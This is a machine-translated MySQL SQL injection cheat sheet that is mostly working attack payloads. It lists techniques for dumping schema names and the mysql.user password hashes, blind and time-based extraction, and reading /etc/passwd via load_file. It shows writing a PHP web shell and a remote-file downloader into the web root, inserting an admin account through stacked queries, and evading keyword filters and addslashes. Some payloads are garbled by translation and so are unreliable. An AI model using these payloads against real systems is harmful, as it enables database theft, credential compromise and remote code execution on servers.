MySQL Inject science

The database that exists by default:

Mysql	Requires root permission to read
Information_schema	exists in more than 5 versions

Test for the presence of an injection method

False: Indicates that the query is wrong (MySQL error/Return page is different from the original)

True: Indicates that the query is normal (the return page is the same as the original)

A total of three cases:

when querying for string types:	when a numeric type is queried:	when landing:
‘ False ‘‘ Really " False "" Really \ False \\ Really	and 1 Really and 0 False and true Really and false False 1-false Return 1 results when there is a problem 1-true Return 0 results when there is a problem 2-1 Returns the same representation as 1 may be problematic 1*56 Returns the same representation as 56 may be problematic 1*56 Return with 1 same rep no problem	' OR ' 1 ' OR 1--- "OR" "=" "OR 1 = 1--- = ' Like ' ' =0--+

Example:

SELECT * FROM Users WHERE id = ' 1 '; SELECT * FROM Users WHERE id = 3-2; SELECT * from Users WHERE username = ' Mike ' and password = ' OR ' = ';

You can use a lot of single and double quotes, as long as they appear in pairs.

SELECT * FROM articles WHERE id = ' 121 ' "" "

The statement after the quotation marks will continue to execute.

Select ' 1 ' "" "" UNION Select ' 2 ' # 1 and 2

The following symbols can be used to annotate statements:

#	Hash syntax
/*	C-style syntax
-- -	SQL syntax
;%0 0	Empty bytes
`	Anti-Quote

Example:

SELECT * from Users WHERE username = ' OR 1=1---' and password = '; SELECT * FROM Users WHERE id = ' UNION SELECT 1, 2, 3 ';

Test database version

VERSION () @ @VERSION @ @GLOBAL. VERSION

If the version is 5, the following example returns to true:

SELECT * FROM Users WHERE id = ' 1 ' and MID (VERSION (), 1, 1) = ' 5 ';

The MySQL query on the Windows platform differs from the one returned on Linux if the Windows Server returns results that contain-nt-log characters.

Database authentication information:

Table	Mysql.user
Field	User, password
Current user	User (), Current_User (), Current_User, System_user (), Session_user ()

Example:

SELECT Current_User; SELECT Concat_ws (0x3A, user, password) from mysql.user WHERE user = ' root '--(privileged)

Database name:

Table	Information_schema.schemata, Mysql.db
Field	Schema_name, DB
Current database	Database (), schema ()

Example:

SELECT database (); SELECT schema_name from Information_schema.schemata; SELECT DISTINCT (db) from mysql.db;--(privileged)

Server Host Name:

@ @HOSTNAME

Example:

SELECT @ @hostname;

Number of table and field detection fields

Two different ways:

ORDER by judgment	ORDER by N+1; Let n continue to increase until the error page appears. Example: Query statement SELECT username, password, permission from Users WHERE id = ' 1 '; 1 ' ORDER by 1--+ true 1 ' ORDER by 2--+ true 1 ' ORDER by 3--+ true 1 ' ORDER by 4--+ false-query uses only 3 fields-1 ' UNION SELECT 1,2,3--+ True
Based on Error query	and (SELECT * from some_existing_table) = 1 Note: This method requires you to know the name of the table you want to query. This error method returns the number of fields in the table, not the wrong query statement. Example: Query statement SELECT permission from Users WHERE id = 1; and (SELECT * from Users) = 1 Returns the number of fields for users

Query table name

Three different ways:

Union mode	UNION SELECT GROUP_CONCAT (table_name) from Information_schema.tables WHERE version=10;--MySQL 4 version with Version=9,mysql 5 version with version=10
Blind note	and SELECT SUBSTR (table_name,1,1) from Information_schema.tables > ' A '
Error	and (select COUNT (*) from (select 1 union SELECT, NULL Union SELECT! 1) x GROUP by CONCAT (SELECT table_name from information _schema.tables LIMIT 1), Floor (RAND (0))) (@:=1) | | @ GROUP by CONCAT ((SELECT table_name from Information_schema.tables LIMIT 1), [email protected]) have @| | MIN (@:=0); and Extractvalue (1, CONCAT (0X5C, (SELECT table_name from information_schema.tables LIMIT 1));--Success in version 5.1.5.

Query Column Name

Union mode	UNION SELECT Group_concat (column_name) from information_schema.columns WHERE table_name = ' tablename '
Blind note	and SELECT SUBSTR (column_name,1,1) from Information_schema.columns > ' A '
Error	and (select COUNT (*) from (select 1 union SELECT, NULL Union SELECT! 1) x GROUP by CONCAT (select column_name from Informatio N_schema.columns LIMIT 1), Floor (RAND (0))) (@:=1) | | @ GROUP by CONCAT ((SELECT column_name from Information_schema.columns LIMIT 1), [email protected]) have @| | MIN (@:=0); and Extractvalue (1, CONCAT (0x5c, (SELECT column_name from Information_schema.columns LIMIT 1));--Success in version 5.1.5. and (+/-) = (SELECT * from some_existing_table UNION select LIMIT 1)--MySQL version 5.1 fixed
Using procedure analyse ()	This requires a web presence page with a field for the query you've injected. Example: Query statement SELECT username, permission from Users WHERE id = 1; 1 PROCEDURE analyse () get the first segment name 1 limit PROCEDURE analyse () get the second segment name 1 limit 2,1 PROCEDURE analyse () get a third segment name

Querying more than one table or column at a time

Select (@) from (select (@:=0x00), (select (@) from (information_schema.columns) WHERE (table_schema>[ Email protected]) and (@) in (@:=concat (@,0x0a, ' [', Table_schema, '] > ', table_name, ' > ', column_name))) x

Example:

SELECT * from the Users WHERE id = '-1 ' UNION select 1, 2, (select (@) from (select (@:=0x00), (select (@) from (Information_sch Ema.columns) WHERE (table_schema>[ Email protected]) and (@) in (@:=concat (@,0x0a, ' [', Table_schema, '] > ', table_name, ' > ', column_name)))) x), 4--+ ';

Output Result:

[Information_schema] >character_sets > Character_set_name [information_schema] >character_sets > DEFAULT_ Collate_name [Information_schema] >character_sets > DESCRIPTION [information_schema] >character_sets > MAX LEN [Information_schema] >collations > collation_name [information_schema] >collations > CHARACTER_SET_NAM  E [Information_schema] >collations > ID [information_schema] >collations > Is_default [information_schema ] >collations > is_compiled

Using code:

SELECT MID (Group_concat (0x3c62723e, 0X5461626C653A20, TABLE_NAME, 0x3c62723e, 0X436F6C756D6E3A20, column_name ORDER by (SELECT version from Information_schema.tables) SEPARATOR 0x3c62723e), 1,1024) from Information_schema.columns

Example:

Select username from Users WHERE id = '-1 ' UNION SELECT MID (Group_concat (0x3c62723e, 0X5461626C653A20, TABLE_NAME, 0x3c627 23e, 0X436F6C756D6E3A20, column_name ORDER by (SELECT version from information_schema.tables) SEPARATOR 0x3c62723e), 1,1024) from Information_schema.columns;

Output Result:

Table:talk_revisionsColumn:revidTable:talk_revisionsColumn:useridTable:talk_revisionsColumn:userTable:talk_ Projectscolumn:priority

The table where the query is based on the column name

SELECT table_name from information_schema.columns WHERE column_name = ' username ';	Query field username table
SELECT table_name from Information_schema.columns WHERE column_name like '%user% ';	Table with user in the query field

Fields that are included based on a table query

SELECT column_name from information_schema.columns WHERE table_name = ' Users ';	Querying fields in the user table
SELECT column_name from Information_schema.columns WHERE table_name like '%user% ';	Query contains fields from the User string table

Bypass Quote Limit

SELECT * from Users WHERE username = 0x61646d696e	Hex Code
SELECT * from Users WHERE username = CHAR (97, 100, 109, 105, 110)	Take advantage of the char () function

Bypass String blacklist

SELECT ' A ' d ' mi ' n ';

SELECT CONCAT (' A ', ' d ', ' m ', ' I ', ' n ');

SELECT concat_ws (', ' a ', ' d ', ' m ', ' I ', ' n ');

SELECT group_concat (' A ', ' d ', ' m ', ' I ', ' n ');

When using concat (), any parameter is NULL, NULL is returned, and CONCAT_WS () is recommended.

The first parameter of the CONCAT_WS () function indicates which character interval is used to query the result.

Conditional statements

Case

IF ()

Ifnull ()

Nullif ()

Example:

SELECT IF (1=1, True, false); SELECT case is 1=1 then true ELSE false END;

Time Delay query:

SLEEP ()	MySQL 5
BENCHMARK ()	MySQL 4/5

Example:

'-(IF (Version (), () like 5, BENCHMARK (100000,SHA1 (' true ')), false))-'

Permissions file Permissions

The following statement can query the user read and write file operation permissions:

SELECT File_priv from mysql.user WHERE user = ' username ';	Requires root user to execute	MySQL 4/5
SELECT grantee, is_grantable from information_schema.user_privileges WHERE privilege_type = ' file ' and grantee like '%user Name% ';	Ordinary users can	MySQL 5

Read file

If the user has file manipulation permissions to read the file:

Load_file ()

Example:

SELECT load_file ('/etc/passwd '); SELECT Load_file (0x2f6574632f706173737764);

• The file must be on the server.
• The current directory of the Load_file () function action file is @ @datadir.
• The MySQL user must have permission to read this file.
• The file size must be less than max_allowed_packet.
• The default size of @ @max_allowed_packet is 1047552 bytes.

Write a file

If the user has file manipulation permissions, the file can be written.

Into Outfile/dumpfile

Write a shell for PHP:

SELECT ' <? System ($_get[\ ' c\ ');?> ' into OUTFILE '/var/www/shell.php ';

Visit the following link:

http://localhost/shell.php?c=cat%20/etc/passwd

Write a download by:

SELECT ' <? Fwrite (fopen ($_get[f], \ ' w\ '), file_get_contents ($_get[u]));?> ' into OUTFILE '/var/www/get.php '

Visit the following link:

Http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt

• Into OUTFILE can not overwrite files that already exist.
• Into OUTFILE must be the last query.
• Quotation marks are necessary because there is no way to encode the pathname.

PDO heap Query mode operation database

PHP uses Pdo_mysql to connect to a database and can use heap queries, which can execute multiple statements at the same time.

SELECT * from Users WHERE id=1 and 1=0; INSERT into Users (username,password,priv) VALUES (' Bobbytables ', ' kl20da$$ ', ' admin ');

MySQL-specific notation

In MySQL,/*! SQL statements * * The SQL statements in this format are parsed as normal statements.

If there is a string followed by a number (this string is the version number of the MySQL database), such as:/*! 12345 SQL Statement */

When the version number is greater than or equal to the number, the SQL statement executes, otherwise it is not executed.

SELECT 1/*!41320union/*!/*!/*!00000select/*!/*! user/*! (/*!/*!/*!*/);

Blur and confuse allowed characters

09	Horizontal Tab
0A	New Line
0B	Vertical Tab
0C	New Page
0D	Carriage Return
A0	Non-breaking Space
20	Space

Example:

'%0a%09union%0cselect%a0null%20%23

Parentheses can also be used to bypass filtering of whitespace:

28	(
29	)

Example:

UNION (SELECT (column) from (table))

Characters that can be followed by and OR or

20	Space
2 b	+
The	-
7E	~
21st	!
40	@

Example:

SELECT 1 from dual WHERE 1=1 and-+-+-+-+~~ ((1))

Dual is a virtual table that can be used for testing.

Several examples of blacklist bypass based on the keyword blacklist

Filter keywords	And OR
PHP code	Preg_match ('/(and|or)/I ', $id)
The attack code that will be filtered	1 or 1=1 1 and 1=1
Bypass mode	1 | | 1=1 1 && 1=1

Here's how you need to know some table and field names (you can use the SUBSTRING function to get the data from a information_schema.columns table)

Filter keywords	and OR union
PHP code	Preg_match ('/(and|or|union)/I ', $id)
The attack code that will be filtered	Union Select User,password from Users
Bypass mode	1 && (select User from users where userid=1) = ' admin '

Filter keywords	and or union where
PHP code	Preg_match ('/(and|or|union|where)/I ', $id)
The attack code that will be filtered	1 && (select User from users where user_id = 1) = ' admin '
Bypass mode	1 && (select User from users limit 1) = ' admin '

Filter keywords	and or union where
PHP code	Preg_match ('/(and|or|union|where)/I ', $id)
The attack code that will be filtered	1 && (select User from users where user_id = 1) = ' admin '
Bypass mode	1 && (select User from users limit 1) = ' admin '

Filter keywords	And, or, union, where, limit
PHP code	Preg_match ('/(and|or|union|where|limit)/I ', $id)
The attack code that will be filtered	1 && (select User from users limit 1) = ' admin '
Bypass mode	1 && (select User from Users group by user_id have user_id = 1) = ' admin ' #user_id聚合中user_id为1的user为admin

Filter keywords	And, or, union, where, limit, group by
PHP code	Preg_match ('/(and|or|union|where|limit|group by)/I ', $id)
The attack code that will be filtered	1 && (select User from Users group by user_id have user_id = 1) = ' admin '
Bypass mode	1 && (select substr (Group_concat (user_id), 1) user from users) =

Filter keywords	And, or, union, where, limit, group by, select
PHP code	Preg_match ('/(And|or|union|where|limit|group by|select)/I ', $id)
The attack code that will be filtered	1 && (select substr (Gruop_concat (user_id), 1) user from users) =
Bypass mode	1 && substr (user,1,1) = ' a '

Filter keywords	And, or, union, where, limit, group by, select, '
PHP code	Preg_match ('/(And|or|union|where|limit|group by|select|\ ')/I ', $id)
The attack code that will be filtered	1 && (select substr (Gruop_concat (user_id), 1) user from users) =
Bypass mode	1 && user_id is not null 1 && substr (user,1,1) = 0x61 1 && substr (user,1,1) = Unhex (61)

Filter keywords	And, or, union, where, limit, group by, select, ', Hex
PHP code	Preg_match ('/(And|or|union|where|limit|group by|select|\ ' |hex)/I ', $id)
The attack code that will be filtered	1 && substr (user,1,1) = Unhex (61)
Bypass mode	1 && substr (user,1,1) = Lower (conv (11,10,16)) #十进制的11转化为十六进制, and lowercase.

/tr>

filter keyword	and, or, union, where, limit, group by, select, ', Hex, substr
PHP code	Preg_match ('/(And|or|union|where|limit|group by|select|\ ' |hex|substr)/I ', $id)
will filter the attack code	1 && substr (user,1,1) = Lower (conv (11,10,16))/td>
Bypass Mode	1 && lpad (user,7,1)

Filter keywords	And, or, union, where, limit, group by, select, ', Hex, substr, Space
PHP code	Preg_match ('/(And|or|union|where|limit|group by|select|\ ' |hex|substr|\s)/I ', $id)
The attack code that will be filtered	1 && lpad (user,7,1)/td>
Bypass mode	1%0b| |%0 Blpad (user,7,1)
Filter keywords	and or union where
PHP code	Preg_match ('/(and|or|union|where)/I ', $id)
The attack code that will be filtered	1 | | (Select User from users where user_id = 1) = ' admin '
Bypass mode	1 | | (Select User from users limit 1) = ' admin '

Using regular expressions to make blind bets

As we all know, in MySQL 5+, all the library names, indicating and field name information are stored in the INFORMATION_SCHEMA library. The attack mode is as follows:

1. Determine if the first character of the first table name is a A-Z character, where Blind_sqli is the assumed known library name.

Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a- Z] ' LIMIT 0,1)/*

2. Determine if the first character is a character in A-n

Index.php?id=1 and 1= (select 1 from information_schema.tables  WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a-n] ' LIMIT 0,1)/*

3. Determine that the character is n

Index.php?id=1 and 1= (select 1 from information_schema.tables  WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^n ' LIMIT 0,1)/*

4, the expression is replaced as follows

At this point the table name is news, to verify that the regular expression is ' ^news$ ', but it is not necessary to directly judge table_name = ' news ' is OK.

5, next guess to solve the other table only need to modify limit 2,1 limit, you can be the next table blind note.

Injection after ORDER BY

oder by because it is a sort statement, you can use conditional statements to make judgments, according to the results of the return of the order of different judging conditions of true and false.

It is possible that a variable with a oder or an out-of-the-way can be injected in the following ways when you know a field:

Original link: Http://www.test.com/list.php?order=vote is sorted according to the vote field.

Find the largest number of votes num then construct the following link:

Http://www.test.com/list.php?order=abs (vote-(User ()) >0) *num) +ASC

See if the sort changes.

There is also a method that does not need to know any field information, using the RAND function:

Http://www.test.com/list.php?order=rand (True) Http://www.test.com/list.php?order=rand (false)

The above two returns a different sort, and the statement that determines whether the first character in the table name is less than 128 is as follows:

Http://www.test.com/list.php?order=rand ((select char (substring (table_name,1,1)) from Information_schema.tables Limit 1) <=128))

Wide byte injection

The most commonly used GBK encoding in SQL injection is the one that bypasses the transfer of special characters such as Addslashes. The Hex of the backslash () is%5c, and when you enter%bf%27, the function encounters a single quote auto-transfer join \, at which point the%bf%5c%27,%bf%5c becomes a wide character "縗" in GBK. %BF that position can be any character in the middle of the%81-%fe. Wide character injection can be applied in many places, not just in SQL injection.

MySQL Inject science